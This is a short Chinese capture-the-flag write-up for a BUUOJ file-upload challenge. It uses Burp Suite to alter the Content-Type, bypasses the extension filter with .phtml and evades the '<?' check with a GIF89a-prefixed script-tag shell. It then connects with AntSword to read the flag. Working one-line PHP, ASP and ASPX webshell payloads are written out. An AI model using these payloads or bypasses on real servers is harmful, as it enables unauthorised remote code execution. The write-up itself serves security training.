题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,提示上传图片文件
第二步:从本地上传图片,查看检测方式
从本地上传一张照片,使用burpsuit抓包,看到Content-Type一栏标注了格式为 image/png
第三步:准备一句话木马进行上传
- 一句话木马种类:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
- 将php的写入1.php文件里上传,使用burpsuit抓包后将Content-Type一栏进行修改,发现对php文件后缀名进行了拦截
- 可以将php改写为
php3,php4,php5,phtml,pht
绕过后缀名检测,经检验phtml可以绕过检测 - 将后缀名修改为phtml后再次上传发现对文本内的
<?
进行了拦截,讲一句话木马修改为:GIF89a? <script language="php">eval($_REQUEST[pass])</script>
再次进行上传发现上传成功
第四步:使用蚁剑进行连接
- 蚁剑添加URL为:
http://e907786a-643a-4ec2-aa30-b72b4cedd782.node3.buuoj.cn/upload/1.phtml
- 右键点出虚拟终端,使用命令
cat /flag
查看flag